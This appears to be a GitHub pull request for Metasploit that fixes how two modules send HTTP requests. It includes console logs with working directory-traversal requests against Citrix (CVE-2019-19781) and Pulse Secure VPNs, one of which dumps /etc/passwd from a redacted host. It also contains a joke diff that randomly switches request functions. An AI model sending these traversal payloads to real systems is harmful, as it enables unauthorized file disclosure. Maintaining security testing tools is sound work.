Fix #12813, prefer send_request_cgi over send_request_raw #12820

wvu · 2020-01-14T06:44:03Z

Fixes #12813 and more specifically #12816 (comment). The only tradition is CHAOS.

msf5 auxiliary(scanner/http/citrix_dir_traversal) > run

********************
####################
# Request:
####################
GET /vpn/../vpns/cfg/smb.conf HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Tue, 14 Jan 2020 06:40:03 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sun, 12 Jan 2020 22:27:43 GMT
ETag: "53-59bf8de0ad5c0"
Accept-Ranges: bytes
Content-Length: 83
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Content-Type: text/plain; charset=UTF-8

[global]
	encrypt passwords = yes
	name resolve order = lmhosts wins host bcast

[+] http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf - The target is vulnerable to CVE-2019-19781.
[+] Obtained HTTP response code 200 for http://127.0.0.1:8080/vpn/../vpns/cfg/smb.conf. This means that access to /vpn/../vpns/cfg/smb.conf was obtained via directory traversal.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/http/citrix_dir_traversal) >

msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
********************
####################
# Request:
####################
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: [redacted]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded


####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: max-age=86400, must-revalidate
Last-Modified: Mon, 09 Sep 2019 15:10:05 GMT
Content-Length: 273
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20200114004238_default_[redacted]_PulseSecureVPN_774075.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Note the only difference is Content-Type: application/x-www-form-urlencoded, and it isn't an issue for these vulns.

Since I bypassed query/vars_get, send_request_cgi is fine now.

bcoles · 2020-01-14T06:48:41Z

The only tradition is CHAOS.

diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb
index 3bcec88e4a..364a84ec94 100644
--- a/lib/msf/core/exploit/http/client.rb
+++ b/lib/msf/core/exploit/http/client.rb
@@ -308,7 +308,7 @@ module Exploit::Remote::HttpClient
   #
   # Passes +opts+ through directly to Rex::Proto::Http::Client#request_raw.
   #
-  def send_request_raw(opts={}, timeout = 20, disconnect = false)
+  def send_request_raw2(opts={}, timeout = 20, disconnect = false)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else
@@ -354,6 +354,21 @@ module Exploit::Remote::HttpClient
     end
   end
 
+  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
+
+  def send_request_raw(opts={}, timeout = 20, disconnect = true)
+    if [true, false].sample
+      send_request_raw2(opts, timeout, disconnect)
+    else
+      send_request_cgi2(opts, timeout, disconnect)
+    end
+  end
 
   # Connects to the server, creates a request, sends the request,
   # reads the response
@@ -361,7 +376,7 @@ module Exploit::Remote::HttpClient
   # Passes `opts` through directly to {Rex::Proto::Http::Client#request_cgi}.
   #
   # @return (see Rex::Proto::Http::Client#send_recv))
-  def send_request_cgi(opts={}, timeout = 20, disconnect = true)
+  def send_request_cgi2(opts={}, timeout = 20, disconnect = true)
     if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
       actual_timeout = datastore['HttpClientTimeout']
     else

wvu · 2020-01-14T06:51:32Z

APPROVED.

wvu added 2 commits January 14, 2020 00:25

Prefer send_request_cgi over send_request_raw

16d06b3

Update pulse_secure_file_disclosure, too

002fe64

Since I bypassed query/vars_get, send_request_cgi is fine now.

wvu added module bug rn-no-release-notes no release notes labels Jan 14, 2020

wvu self-assigned this Jan 14, 2020

wvu added a commit that referenced this pull request Jan 14, 2020

Land #12820: Fix #12813, send_request_cgi change

1636008

wvu merged commit 002fe64 into rapid7:master Jan 14, 2020

wvu deleted the bug/citrix branch January 14, 2020 06:46

msjenkins-r7 pushed a commit that referenced this pull request Jan 14, 2020

Land #12820: Fix #12813, send_request_cgi change

03d2d5e

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Fix #12813, prefer send_request_cgi over send_request_raw #12820

Fix #12813, prefer send_request_cgi over send_request_raw #12820

wvu commented Jan 14, 2020

bcoles commented Jan 14, 2020

wvu commented Jan 14, 2020

Fix #12813, prefer send_request_cgi over send_request_raw #12820

Fix #12813, prefer send_request_cgi over send_request_raw #12820

Conversation

wvu commented Jan 14, 2020

bcoles commented Jan 14, 2020

wvu commented Jan 14, 2020